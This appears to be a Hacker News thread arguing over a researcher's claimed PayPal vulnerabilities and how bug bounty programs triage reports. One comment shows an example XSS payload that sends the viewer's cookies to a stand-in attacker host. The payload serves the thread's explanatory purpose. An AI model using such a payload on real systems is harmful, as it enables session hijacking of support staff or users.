People have a weird mental model of how big-company bug bounty programs work. Paypal --- a big company for sure, with a large and talented application security team --- is not interested in stiffing researchers out of bounties. They have literally no incentive to do so. In fact: the people tasked with running the bounty probably have the opposite incentive: the program looks better when it is paying out bounties for strong findings.
Here are the vulnerabilities in their report:
1. They can suppress a new-computer login challenge (they call this "2FA", but this is a risk-based login or anti-ATO feature, not 2FA).
2. They can register accounts for one phone, then change it to another phone, to "bypass" phone number confirmation.
3. There are risk-based controls in Paypal that prevent transactions when anomalies are detected, and some of them can apparently be defeated with brute force.
4. They can change names on accounts they control.
5. They found what appears to be self-XSS in a support chat system.
6. They found what appears to be self-XSS in the security questions challenge inputs.
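On #3, "defeated with brute force" is at least plausible on its face: if a risk control gates on a short numeric code and isn't rate-limited, the search space is tiny. A back-of-envelope sketch (generic numbers; none of this comes from PayPal's actual systems):

```python
# Rough feasibility check for brute-forcing an unthrottled numeric code.
# Purely illustrative -- the digit count and request rate are assumptions.

def expected_attempts(digits: int) -> int:
    """Average guesses needed to hit a uniformly random n-digit code."""
    return (10 ** digits) // 2

def hours_to_crack(digits: int, guesses_per_second: float) -> float:
    """Average wall-clock hours at a given guess rate."""
    return expected_attempts(digits) / guesses_per_second / 3600

# A 6-digit code at a modest 50 requests/second falls in under 3 hours
# on average -- which is why throttling and lockout matter.
print(round(hours_to_crack(6, 50), 1))  # -> 2.8
```

So the interesting question isn't whether such a code can be brute-forced in principle, but what rate limiting and lockout sit in front of it.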
None of these are sev:hi vulnerabilities, let alone "critical". 2 of them --- #4 and #6 --- are duplicates of other people's issues. Self-XSS vulnerabilities are often excluded entirely from bounty programs.
For the last 3 hours, the top comment on this thread has been an analysis saying that, because Paypal is PCI-encumbered, and HackerOne reports can function as "assessments" for PCI attestations, Paypal is in danger of losing its PCI status (and the fact that it won't is evidence that they are "too big to fail"). To put it gently: that is not how any of this stuff works. In reality, formal bug bounty programs are a firehose of reports suggesting that DKIM configuration quirks are critical vulnerabilities, and nobody in the world would expect any kind of regulatory outcome simply from the way a bounty report does or doesn't get handled. It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.
The login challenge bypass finding was actually interesting (it would be more interesting if they fully disclosed what it was and what Paypal's response was). But these reporters have crudded up their story with standard bug-bounty-reporter hype, and made it very difficult to judge what they found. I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).
For #5, I believe it's not just self-XSS: it also executes in the support agent's browser, potentially allowing you to exfiltrate their session cookies:
> Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.
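For illustration, the kind of payload being described would look roughly like this. Everything here is hypothetical: the attacker host, the markup, and, crucially, whether PayPal's agent-side chat UI renders customer messages as raw HTML at all, which is exactly what's in dispute:

```html
<!-- Hypothetical chat message; only fires if the agent-side UI
     renders customer input as raw HTML instead of escaping it. -->
<img src="x" onerror="
  // Send the agent's readable cookies to an attacker-controlled host.
  fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie));
">
```

Even then, any session cookie marked HttpOnly is invisible to `document.cookie`, so the cookie-theft claim additionally assumes the session cookie lacks that flag.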
> It should, I hope, go without saying that nobody is required to run a bounty in the first place, and most companies probably shouldn't.
Really? Most companies? That seems like an extraordinary claim.
I'm not a security researcher but if I stumbled on some security issue in something that's not open-source and not owned by my employer, the only way I'd consider reporting it is if they have a bug bounty / responsible disclosure program. Otherwise I'd expect it would be about as likely for me to receive a "thank you" as a knock on the door from law enforcement.
That depends on the kind of issue you found and the type of service it was, but, yes: without an authorization of some sort, it's probably unlawful to test for large classes of serverside vulnerabilities. The kind of work Project Zero does, on the other hand, is both more impactful and does not usually require authorization, since they're analyzing software running on their own machines.
Most companies should not run bug bounties. Most companies haven't even had a competently run software security assessment (either from an in-house software security expert or from a retained third party). Authorizing serverside tests and soliciting inbound reports from random people is not on the list of "first things you should do to get your house in order", and most people do not have their houses in order.
If this sounds like an extraordinary claim, I'd suggest maybe paying more attention to software security people and less attention to Reddit and HN stories about bug bounties; it's easy to get the wrong impression from message board threads, and as you can pretty plainly see, a lot of commentary on message board threads isn't well-informed.
Katie Moussouris is maybe a good starting point if you want to inject the "bug bounties can be bad" take directly into your veins. But there are lots of other people to listen to; it's a mainstream take. If you want a pro-bounty take, you can read what Cody Brocious writes. My (mainstream) take isn't the only decent take.
> I'm inclined not to believe their claim that Paypal acted abusively here (and I am not a fan of Paypal).
I agree that they have some issues with the way they've reported it, and I agree with your numbered points, except that the reporters imply #5 may make the support agent vulnerable. But I'm not sure you can say PayPal haven't acted abusively. Many of the reports are legitimate vulnerabilities even if they aren't critical ones. The first is clearly a security issue, yet PayPal have said that it isn't. In return the reporters have received nothing but a reputation hit, and that is clearly unfair.
Do PayPal specifically say that anything involving stolen details is out of scope? That seems a bit weak, considering they have numerous systems in place to combat misuse of stolen accounts. And even if they do, it doesn't explain #2.
edit: To answer my own question, the page lists "Vulnerabilities involving stolen credentials or physical access to a device" as out of scope for web applications. They likely intend that to apply to mobile applications too, but they've structured the page in a way that makes that ambiguous.
This is why this article is a bad HN submission - it's not really on everybody on HN to figure out whether these reports are any good, whether they were handled correctly by PayPal, HackerOne, etc. It's up to the people writing them up to make this as clear as possible and they don't come anywhere close to that. This just creates a massive discussion driven by speculation and off-topic tangents about a problem people had on ebay and talmudic regulatory 'analysis'.
What proof do you have that #6 is not persistent XSS? If it is, that's a potentially brutal vuln (as persistent XSS often is), even if you need the user's password to exploit it.
And persistent XSS is definitely not out of scope according to PayPal's guidelines. https://hackerone.com/paypal
Why are you saying #6 is a duplicate of other people's issues? It must have been marked as a dupe of an N/A. They would have gained rep if it was a dupe of someone else's report. They lost rep, so it was most likely marked as a dupe of an N/A.
As I mention below, the big problem is that the OP didn't include POCs. It's easy to claim "oh, this can be exploited so easily", but without a POC it's not always clear, and perhaps he missed some detail that made his assumptions incorrect.
Anyways, I do have to say HackerOne looks pretty cool. This is the first I've seen of it, and they seem like they are working very hard (we all should be working hard) to make this work for everyone. They are likely just victims of their own success.
I agree that real stored XSS is a serious issue. Here, they're using a MITM to get the XSS payload injected, and Paypal has closed it saying it's not "externally exploitable". It sure looks like self-XSS to me. I agree: a POC would clear this up.
All I'll say beyond that is that if they had doc'd a real stored XSS bug in Paypal, my assumption would be that they'd get a bounty for that. That they did not get a bounty for it suggests that it was invalid. Paypal does not have any incentive to stiff researchers on valid submissions; they have in fact the opposite incentive.
Uh, some of these vulnerabilities are critical. And just because corporate signs up for a HackerOne bug bounty doesn't mean that the security engineers managing triage are happy about it.
Security analysis and penetration testing always results in the perception that the security auditor is calling their baby ugly. Always.
Sorry, on further thought while I still disagree with the analysis above as being overly dismissive, I think the OP may share some blame for not writing higher quality reports with POCs. Also, the OP doesn't explain whether or not they saw the original reports for those marked Duplicate. That's a very critical point. See here -
For anyone actually interested here and not just drive by commenting (like me, ahem), it's worthwhile looking into the platform in more detail. See my post below -
I don't understand your argument here. "You patch you pay" is not a market term on any bug bounty; people report sev:infos all the time that ultimately get patched, but aren't worth anything (this is why some bounty programs stock sticker and t-shirt SWAG, to placate these submissions).
Meanwhile: I don't care even a little bit how Paypal arrived at their "duplicate" response, because Paypal has no incentive to deny a bounty for a valid bug. Like I said above, they have the opposite incentive. Duplicates happen all the time. If Paypal --- or any other large company --- says it was a duplicate bug, it would take extraordinarily clear evidence for me to believe otherwise.
Some of these things are probably not true for fly-by-night companies that set up bounty programs (a lot of people run bounties that shouldn't). I'm not denying that there are random companies that do ruthlessly screw with bounty submitters; I don't know any of them, but I believe they exist. But the money Paypal spends on bounties, all put together, barely even qualifies as a rounding error. They do not care; nobody serious cares enough to squelch reports to avoid paying bounties.
The fact that this was reported as "six critical vulnerabilities" is enough for me to tilt the credibility scale in the other direction.
Later
I'd appreciate it if you didn't edit your comment out from under my reply; the convention on HN is to update your post to clarify your argument in a PS, not to simply delete the parts you felt didn't hold up to scrutiny.
Oh, sorry about that. Bad habit. Had hoped to get to it before you wasted your time.
That all said, I think you have a knee-jerk reaction (given your history) to side with Large Corp. It shows here, and it really felt that way: way overly dismissive and condescending.
Having personally worked for large corporations, I can say that the "it's not personal, it's business" motto is pure evil bullshit better suited to the mob.
If you (the royal you) can't treat people with respect that they deserve, don't engage until you can.
My history? I haven't worked for a "large corp" since 1998. Our company works exclusively with startups.
When I say that Paypal has incentives not to ruthlessly deny bounties, I mean actual incentives, not "it feels good to do good" type stuff. Even if their reputation among bounty hunters is factored out: they literally have an incentive to pay bounties. That's the metric by which bounty programs are judged.
I agree -- the tone of the article was cloak-and-dagger, which makes me think things are not what they seem. Unless we fully understand the exact set of issues, it is difficult to decide either way.
Sadly, this also undermines trust in the overall state of "security research", which most of the time, borders on being silly. :-/
This is on the more-competent end of the spectrum of bounty submissions, for what it's worth. Because the median bounty submission is very, very bad.
These people at least appear to have done some actual work. Paypal is probably one of the most overfished ponds in application security, and they didn't come up with much, but it's at least sort of interesting.
out of curiosity, do you work at PayPal or is the first paragraph all assumptions?
One would have thought Wells Fargo had a talented team of people to catch the millions of fake accounts they made, but alas, it went on for a decade. I will always assume companies have their backs turned to security until proven otherwise, regardless of size or perceived risk.
First, I do not work at Paypal, and have never worked at Paypal.
Second, if I did, it would be none of your business.
Third, comments like these are forbidden by the site guidelines, which demand that you not make accusations of astroturfing simply because you disagree with a comment.
Charitably interpreted, it's 'just' an accusation you can't possibly know the quality of PayPal's security team since you don't work there and lack the necessary insider knowledge. Calling you a naïf, not a shill!
FWIW, I wasn't claiming either; I was questioning the source of knowledge, as the claim seemed to be factually informed but is in fact just the poster's opinion on the matter.
I am not assuming anything, nor making any accusations. I am simply inquiring as to the source of the claim made. I guess we will establish that it's just the opinion of the poster.
> 1. They can suppress a new-computer login challenge (they call this "2FA", but this is a risk-based login or anti-ATO feature, not 2FA).
2FA means 2 Factor Authentication. This works by forcing one to use two different forms of identification to authenticate, such as login/password and, in this case, identification of the computer used.
So, with all respect sir, what I'm saying is while this isn't the best 2FA, it absolutely IS 2FA by definition.
This feature is not 2FA, and your argument is incoherent even if you fix the terminology, because many anti-ATO systems are heuristic and intrinsically "bypassable" by design, and yet you still want services to have them. ATO is an arms race.
This anti-ATO mechanism is asking for a code delivered via email (something you have) in order to grant access to the account. That is authentication via an additional factor, i.e. 2FA.
If you implemented this feature and called it your "2FA system", security engineers would laugh at you. It's clearly not 2FA. And, of course, Paypal has actual 2FA.
Authorization is not authentication, by definition. Furthermore, your link is talking about an entirely unrelated meaning of ATO. I believe tptacek meant it to stand for "account take-over".
Same difference. Anti-account-takeover and account authentication overlap, because similar methods would be deployed (i.e., multi-factor authentication, heuristics, etc.).
At risk of pointing out the obvious, ATO (as in Authorization To Operate) has nothing to do with logging in, technical authentication, or technical authorization. An ATO is a piece of paper or equivalent that lets your business deploy a product or solution, primarily used in the government space. It’s a contract that a human/organization signs, not a part of the login process for a computer.